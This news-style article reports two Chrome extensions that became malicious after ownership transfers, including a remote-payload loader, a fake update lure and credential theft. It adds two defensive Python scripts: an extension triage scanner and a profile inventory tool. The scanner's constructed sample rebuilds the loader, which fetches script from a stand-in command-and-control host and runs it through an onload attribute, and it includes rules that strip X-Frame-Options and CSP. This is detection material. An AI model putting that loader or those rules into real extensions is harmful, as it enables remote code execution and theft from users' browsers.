Chrome Extension Turns Malicious After Ownership Transfer, Enabling Code Injection and Data Theft
Google Chrome Extensions Turn Malicious in Supply Chain Attack: Users Warned of Data Theft and Malware Risks
In a concerning development for Chrome users worldwide, two once-legitimate Google Chrome extensions have been weaponized in what appears to be a coordinated supply chain attack, putting thousands of users at risk of data theft, malware infection, and privacy breaches.
The malicious extensions in question are QuickLens – Search Screen with Google Lens and ShotBird – Scrolling Screenshots, Tweet Images & Editor. These seemingly harmless browser tools have been transformed into dangerous malware delivery mechanisms following ownership transfers to unknown threat actors.
QuickLens, which boasted approximately 7,000 users before being removed from the Chrome Web Store, and ShotBird, still available with around 800 active users, were originally developed by an individual known as Akshay Anu S (@AkshayAnuOnline). The developer had marketed QuickLens as a productivity tool while claiming ShotBird could create “professional, studio-like visuals” with all processing happening locally on users’ devices.
However, the situation took a dark turn when both extensions changed hands. QuickLens was listed for sale on ExtensionHub just two days after its initial publication in October 2025, eventually falling under the control of a new owner identified as “[email protected]” on February 1, 2026. ShotBird similarly transferred ownership to “[email protected]” in January 2025, shortly after receiving a “Featured” badge from the Chrome Web Store.
The malicious updates pushed to these extensions represent a notable evolution in browser-based attacks. Security researchers found that the compromised QuickLens extension uses a technique that defeats static review of the package: the malicious code never appears in the extension’s source files. Instead, the extension polls an external command-and-control server every five minutes and stores the JavaScript payloads it receives in the browser’s local storage.
These payloads are then executed through a deceptive mechanism: the extension creates a hidden 1×1 pixel GIF element and sets the malicious JavaScript as its “onload” attribute. Once the image loads, the harmful code executes, giving attackers remote control over affected browsers.
The ShotBird extension employs a similar but slightly different approach, using direct callbacks to deliver JavaScript code. This code displays a fake Google Chrome browser update prompt. When unsuspecting users click to “update,” they’re redirected to a ClickFix-style page that opens the Windows Run dialog, launches “cmd.exe,” and pastes a PowerShell command. This chain of events results in the download of an executable named “googleupdate.exe” on Windows systems.
Once installed, this malware exhibits extensive capabilities that extend far beyond simple data collection. The malicious software hooks into HTML input elements, textareas, and select fields, capturing everything users type—including credentials, PINs, credit card details, authentication tokens, and government identification numbers. Additionally, it siphons data stored within the Chrome browser itself, such as saved passwords, browsing history, and information about installed extensions.
Security experts emphasize that this represents a “two-stage abuse chain” combining extension-side remote browser control with host-level execution. The implications are severe: what began as a browser-only abuse scenario has escalated to potential credential theft and broader endpoint compromise.
The attack is also careful to stay unnoticed. Researchers note that the malicious versions keep their original functionality, so ordinary users have no visible reason to suspect them. The code also strips security headers such as X-Frame-Options from HTTP responses, which lets the injected scripts make arbitrary requests to other domains and bypass Content Security Policy protections.
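As an added example (not code from the article, from the researchers it cites, or from either extension), the Python script below triages an unpacked extension directory for the two behaviours described above: the QuickLens loader shape (a periodic timer, a fetch from a remote host, a payload written to extension storage, and script assigned to an on* attribute of a created element) and declarativeNetRequest rules that remove X-Frame-Options or Content-Security-Policy response headers. The rule names, severities and the sample extension files, including the `c2.example.invalid` host, are constructed for the example.

```python
"""Static triage of an unpacked Chrome extension for the loader shape and the
header-stripping behaviour the article describes. Added example, not code from
the article or the extensions it names; rule names and the sample files are
constructed for illustration."""
import json
import re

# Heuristic source rules (name, regex, severity). Hits are review leads, not
# proof of malice: legitimate extensions use timers, fetch and storage too.
SOURCE_RULES = [
    ("periodic-timer", re.compile(r"\b(setInterval|chrome\.alarms\.create)\s*\("), "low"),
    ("remote-fetch", re.compile(r"\bfetch\s*\(\s*[\"'`]https?://"), "low"),
    ("storage-write", re.compile(r"chrome\.storage\.(local|session|sync)\.set\s*\("), "low"),
    ("handler-attribute", re.compile(r"\.setAttribute\s*\(\s*[\"']on[a-z]+[\"']"), "high"),
    ("dynamic-eval", re.compile(r"\b(eval|new\s+Function)\s*\("), "high"),
]
PROTECTIVE_HEADERS = {"x-frame-options", "content-security-policy"}  # removal defeats framing/CSP
SENSITIVE_PERMISSIONS = {"webRequest", "webRequestBlocking", "declarativeNetRequest",
                         "declarativeNetRequestWithHostAccess", "scripting", "debugger"}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# The four-part loader shape described for QuickLens: timer, remote fetch,
# payload kept in storage, execution through an on* attribute.
LOADER_SHAPE = {"periodic-timer", "remote-fetch", "storage-write", "handler-attribute"}

def scan_source(path, text):
    """One finding per rule hit: (rule, path, 1-based line, severity)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, pattern, severity in SOURCE_RULES:
            if pattern.search(line):
                findings.append((rule, path, lineno, severity))
    return findings

def scan_dnr_rules(path, text):
    """Flag declarativeNetRequest rules that remove protective response headers."""
    findings = []
    for rule in json.loads(text):
        action = rule.get("action", {})
        if action.get("type") != "modifyHeaders":
            continue
        for hdr in action.get("responseHeaders", []):
            name = hdr.get("header", "").lower()
            if hdr.get("operation") == "remove" and name in PROTECTIVE_HEADERS:
                findings.append(("strips-" + name, path, rule.get("id"), "high"))
    return findings

def scan_manifest(path, text):
    """Permission findings plus the DNR rule files the manifest declares."""
    manifest = json.loads(text)
    perms = set(manifest.get("permissions", []))
    findings = [("permission-" + p, path, None, "medium") for p in sorted(perms & SENSITIVE_PERMISSIONS)]
    if (perms | set(manifest.get("host_permissions", []))) & BROAD_HOSTS:
        findings.append(("all-hosts", path, None, "medium"))
    resources = manifest.get("declarative_net_request", {}).get("rule_resources", [])
    return findings, [r.get("path") for r in resources]

def triage(files):
    """files: mapping of relative path -> text. Returns (findings, verdict)."""
    findings, rule_files = scan_manifest("manifest.json", files["manifest.json"])
    for path, text in files.items():
        if path.endswith(".js"):
            findings += scan_source(path, text)
        elif path in rule_files:
            findings += scan_dnr_rules(path, text)
    hit = {f[0] for f in findings}
    # Escalate on any high-severity rule or when all four loader parts co-occur.
    if LOADER_SHAPE <= hit or any(f[3] == "high" for f in findings):
        return findings, "review-high"
    return findings, "review" if findings else "clean"

# Constructed sample showing the loader shape plus header-stripping rules.
SAMPLE = {
    "manifest.json": json.dumps({
        "manifest_version": 3, "name": "Sample Screenshot Tool", "version": "2.1.0",
        "permissions": ["alarms", "storage", "declarativeNetRequest"],
        "host_permissions": ["<all_urls>"], "background": {"service_worker": "bg.js"},
        "declarative_net_request": {"rule_resources": [{"id": "r1", "enabled": True, "path": "rules.json"}]}}),
    "bg.js": 'chrome.alarms.create("tick", { periodInMinutes: 5 });\n'
             'chrome.alarms.onAlarm.addListener(async () => {\n'
             '  const r = await fetch("https://c2.example.invalid/p");\n'
             '  chrome.storage.local.set({ p: await r.text() });\n});\n',
    "cs.js": 'chrome.storage.local.get("p", ({ p }) => {\n'
             '  const img = document.createElement("img");\n'
             '  img.setAttribute("onload", p);\n'
             '  img.src = "px.gif"; document.body.appendChild(img);\n});\n',
    "rules.json": json.dumps([{"id": 1, "priority": 1,
        "action": {"type": "modifyHeaders", "responseHeaders": [
            {"header": "X-Frame-Options", "operation": "remove"},
            {"header": "Content-Security-Policy", "operation": "remove"}]},
        "condition": {"urlFilter": "*", "resourceTypes": ["main_frame", "sub_frame"]}}]),
}
# Constructed benign sample for comparison.
BENIGN = {
    "manifest.json": json.dumps({"manifest_version": 3, "name": "Plain Notes",
                                 "version": "1.0", "permissions": ["storage"]}),
    "notes.js": 'document.getElementById("save").addEventListener("click", save);\n',
}

if __name__ == "__main__":
    for label, files in (("sample", SAMPLE), ("benign", BENIGN)):
        findings, verdict = triage(files)
        print(label, verdict)
        for rule, path, where, severity in findings:
            print(f"  [{severity}] {rule}: {path} @ {where}")
```

Matching the loader’s shape rather than its payload is the point the article makes: the payload never reaches the package, so a scanner has to key on how the package fetches, stores and runs script. Each hit on its own is common in benign extensions, which is why the verdict escalates only on a high-severity rule or when all four loader parts appear together. Run it over every version directory under a profile’s Extensions folder, since the version that ships the loader is the one pushed after the ownership change.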
This incident highlights a growing trend in cyber threats: the weaponization of legitimate software through ownership transfer. The original developer, who had published multiple extensions under their name—all receiving “Featured” badges—appears to have sold these tools to malicious actors. The developer’s presence on ExtensionHub and attempts to sell domains like “AIInfraStack.com” for $2,500 suggest a pattern of monetizing digital assets without regard for their ultimate use.
The Chrome Web Store’s verification system, which granted “Featured” status to these extensions, has come under scrutiny. While the store’s review process may catch obvious malicious code, it cannot prevent bad actors from acquiring legitimate extensions and pushing updates containing hidden threats. This supply chain vulnerability represents a significant challenge for platform security.
Industry analysts warn that this attack is part of a broader trend affecting browser extensions across platforms. Microsoft recently issued warnings about malicious Chromium-based extensions masquerading as legitimate AI assistant tools to harvest LLM chat histories and browsing data. These extensions, appearing as trusted productivity tools, have become persistent data collection mechanisms embedded in enterprise environments.
The threat extends beyond data theft. Other malicious extensions identified by security researchers include lmToken Chromophore, which impersonates the legitimate imToken cryptocurrency wallet while stealing seed phrases through phishing redirects. Another dangerous extension, Chrome MCP Server – AI Browser Control, poses as an AI automation tool but functions as a full-fledged remote access trojan using the Model Context Protocol.
Even extensions that appear to return to the Chrome Web Store after being flagged for malicious behavior pose ongoing risks. Security researchers discovered that extensions like Urban VPN Proxy, Urban Browser Guard, and Urban Ad Blocker, previously identified for scraping AI conversations, had been updated with benign versions following public disclosure of their activities.
The scope of malicious browser extensions is staggering. Unit 42 researchers identified over 30,000 domains involved in a campaign distributing the OmniBar AI Chat and Search extension, which uses the chrome_settings_overrides API to alter browser settings, change home pages, and modify default search providers. This appears to be part of a large-scale affiliate marketing scheme, with similar behavior observed in extensions like AI Output Algo Tool and Serpey.com official extension.
Some extensions engage in more subtle forms of abuse, tracking user browsing activity to inject affiliate markers or extracting and transmitting user Reddit comment threads to developer-controlled API endpoints. Extensions like Care.Sale, Giant Coupons Official Extension, and Consensus – Reddit Comment Summarizer demonstrate how seemingly useful tools can serve as data collection mechanisms.
For users who may have installed these compromised extensions, immediate action is essential. Security experts recommend removing any suspicious extensions from browsers without delay. Users should avoid side-loading or installing unverified productivity extensions, regularly audit browsers for unknown extensions, and uninstall anything that seems unfamiliar or unnecessary.
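One way to do the audit just recommended, as an added example rather than code from the article: the Python script below enumerates the extensions unpacked under a Chrome profile, resolves localized names, and flags records with broad host access, sensitive permissions, a chrome_settings_overrides entry (the key mentioned earlier in connection with OmniBar), or an update URL that is not the Chrome Web Store’s. The default profile paths are assumptions about a standard Chrome install, and the sample profile is constructed in a temporary directory.

```python
"""Inventory the extensions unpacked under a Chrome profile so unfamiliar or
over-privileged ones can be reviewed and removed. Added example, not code from
the article; the default profile paths are assumptions about a standard Chrome
install, and the sample profile is constructed in a temporary directory."""
import json
import os
import platform
import re
import tempfile
from pathlib import Path

EXT_ID = re.compile(r"^[a-p]{32}$")  # Chrome extension IDs: 32 letters from a-p
WEBSTORE_UPDATE = "https://clients2.google.com/service/update2/crx"
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
SENSITIVE = {"webRequest", "webRequestBlocking", "declarativeNetRequest", "scripting",
             "debugger", "nativeMessaging", "cookies", "history"}

def default_profile_dir():
    """Default Chrome profile location per OS (assumed standard install paths)."""
    home, system = Path.home(), platform.system()
    if system == "Windows":
        local = Path(os.environ.get("LOCALAPPDATA", home / "AppData" / "Local"))
        return local / "Google" / "Chrome" / "User Data" / "Default"
    if system == "Darwin":
        return home / "Library" / "Application Support" / "Google" / "Chrome" / "Default"
    return home / ".config" / "google-chrome" / "Default"

def localized_name(manifest, ext_dir):
    """Resolve __MSG_key__ names through _locales/<default_locale>/messages.json."""
    name = manifest.get("name", "")
    m = re.fullmatch(r"__MSG_(\w+)__", name)
    if not m:
        return name
    msgs = ext_dir / "_locales" / manifest.get("default_locale", "en") / "messages.json"
    if not msgs.is_file():
        return name
    entry = json.loads(msgs.read_text(encoding="utf-8-sig")).get(m.group(1), {})
    return entry.get("message", name)

def inventory(profile_dir):
    """One record per installed extension version under <profile>/Extensions."""
    records, ext_root = [], Path(profile_dir) / "Extensions"
    if not ext_root.is_dir():
        return records
    for id_dir in sorted(p for p in ext_root.iterdir() if EXT_ID.match(p.name)):
        for ver_dir in sorted(id_dir.iterdir()):
            mf = ver_dir / "manifest.json"
            if not mf.is_file():
                continue
            manifest = json.loads(mf.read_text(encoding="utf-8-sig"))
            perms = set(manifest.get("permissions", []))
            hosts = perms | set(manifest.get("host_permissions", []))
            records.append({
                "id": id_dir.name,
                "name": localized_name(manifest, ver_dir),
                "version": manifest.get("version"),
                "webstore_update_url": manifest.get("update_url") == WEBSTORE_UPDATE,
                "sensitive_permissions": sorted(perms & SENSITIVE),
                "broad_host_access": bool(hosts & BROAD_HOSTS),
                # Keys such as homepage / search_provider rewrite browser settings.
                "settings_overrides": sorted(manifest.get("chrome_settings_overrides", {})),
            })
    return records

def needs_review(records):
    """Records worth a closer look before deciding whether to keep the extension."""
    return [r for r in records if r["broad_host_access"] or r["sensitive_permissions"]
            or r["settings_overrides"] or not r["webstore_update_url"]]

def build_sample_profile():
    """Constructed profile: one localized, over-privileged extension and one plain one."""
    root = Path(tempfile.mkdtemp(prefix="chrome-profile-sample-"))
    a = root / "Extensions" / ("a" * 32) / "2.1.0_0"
    (a / "_locales" / "en").mkdir(parents=True)
    (a / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "__MSG_appName__", "version": "2.1.0",
        "default_locale": "en", "update_url": WEBSTORE_UPDATE,
        "permissions": ["storage", "declarativeNetRequest"], "host_permissions": ["<all_urls>"],
        "chrome_settings_overrides": {"homepage": "https://example.invalid/"}}))
    (a / "_locales" / "en" / "messages.json").write_text(
        json.dumps({"appName": {"message": "Sample Screenshot Tool"}}))
    b = root / "Extensions" / ("b" * 32) / "1.0_0"
    b.mkdir(parents=True)
    (b / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "Plain Notes", "version": "1.0",
        "update_url": WEBSTORE_UPDATE, "permissions": ["storage"]}))
    return root

if __name__ == "__main__":
    # Against a live profile: inventory(default_profile_dir())
    for r in inventory(build_sample_profile()):
        flag = "REVIEW" if needs_review([r]) else "ok"
        print(flag, r["id"][:8], r["name"], r["version"], r["sensitive_permissions"])
```

Calling `inventory(default_profile_dir())` lists what is actually unpacked on disk, independent of what the browser’s extensions page shows. The 32-letter directory name is the extension ID and can be compared against the Web Store listing; an entry the user does not recognise, or a new version directory for an extension that has not visibly changed, is the kind of item the advice above is about.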
This incident serves as a stark reminder of the risks inherent in our increasingly connected digital ecosystem. As browser extensions become more sophisticated and integrated into our daily workflows, they also become more attractive targets for malicious actors. The convenience they offer must be weighed against the potential for abuse, and users must remain vigilant about the permissions they grant and the sources from which they install software.
The Chrome extension supply chain attack represents a new frontier in cybersecurity threats, where the line between legitimate and malicious software becomes increasingly blurred. As attackers continue to evolve their techniques, users, developers, and platform providers must work together to establish more robust security measures and verification processes to protect against these sophisticated threats.